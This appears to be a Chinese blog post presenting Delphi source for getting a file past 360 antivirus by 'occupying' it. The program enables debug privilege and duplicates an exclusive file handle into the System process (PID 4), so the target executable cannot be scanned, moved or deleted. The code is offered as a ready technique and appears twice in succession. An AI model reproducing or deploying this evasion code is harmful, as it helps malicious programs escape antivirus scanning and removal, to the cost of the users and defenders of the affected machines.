文件占坑法过360查杀
原理是以独占的方式打开文件,再把文件句柄复制到另一个程序中去,达到本程序退出后目标文件仍被打开的目的
program createfile;
uses
Windows, SysUtils;
//提权函数
procedure SetPrivilege;
var
TPPrev, TP: TTokenPrivileges;
TokenHandle: THandle;
dwRetLen: DWORD;
lpLuid: TLargeInteger;
begin
OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);
if (LookupPrivilegeValue(nil, ’SeDebugPrivilege’, lpLuid)) then
begin
TP.PrivilegeCount := 1;
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
TP.Privileges[0].Luid := lpLuid;
AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);
end;
CloseHandle(TokenHandle);
end;
procedure OccupyFile(lpFileName: string);
var
hProcess, hFile, hTargetHandle: thandle;
begin
//打开一个pid为4的进程,只要是存在的进程,都可以
hProcess := OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);
if (hProcess = 0) then exit;
//以独占模式打开目标文件
hFile := CreateFileA(PChar(lpFileName), GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if (hFile = INVALID_HANDLE_VALUE) then
begin
CloseHandle(hProcess);
exit;
end;
//把文件句柄复制到pid=4的进程中去,这样,只要pid=4的进程不退出,谁也动不了目标文件
DuplicateHandle(GetCurrentProcess(), hFile, hProcess, @hTargetHandle, 0, FALSE, DUPLICATE_SAME_ACCESS or DUPLICATE_CLOSE_SOURCE);
CloseHandle(hProcess);
end;
begin
SetPrivilege;
OccupyFile(’D:\Program Files\工具软件\任务管理.exe’);//这是要保护的程序名
end.
uses
Windows, SysUtils;
//提权函数
procedure SetPrivilege;
var
TPPrev, TP: TTokenPrivileges;
TokenHandle: THandle;
dwRetLen: DWORD;
lpLuid: TLargeInteger;
begin
OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);
if (LookupPrivilegeValue(nil, ’SeDebugPrivilege’, lpLuid)) then
begin
TP.PrivilegeCount := 1;
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
TP.Privileges[0].Luid := lpLuid;
AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);
end;
CloseHandle(TokenHandle);
end;
procedure OccupyFile(lpFileName: string);
var
hProcess, hFile, hTargetHandle: thandle;
begin
//打开一个pid为4的进程,只要是存在的进程,都可以
hProcess := OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);
if (hProcess = 0) then exit;
//以独占模式打开目标文件
hFile := CreateFileA(PChar(lpFileName), GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if (hFile = INVALID_HANDLE_VALUE) then
begin
CloseHandle(hProcess);
exit;
end;
//把文件句柄复制到pid=4的进程中去,这样,只要pid=4的进程不退出,谁也动不了目标文件
DuplicateHandle(GetCurrentProcess(), hFile, hProcess, @hTargetHandle, 0, FALSE, DUPLICATE_SAME_ACCESS or DUPLICATE_CLOSE_SOURCE);
CloseHandle(hProcess);
end;
begin
SetPrivilege;
OccupyFile(’D:\Program Files\工具软件\任务管理.exe’);//这是要保护的程序名
end.
浙公网安备 33010602011771号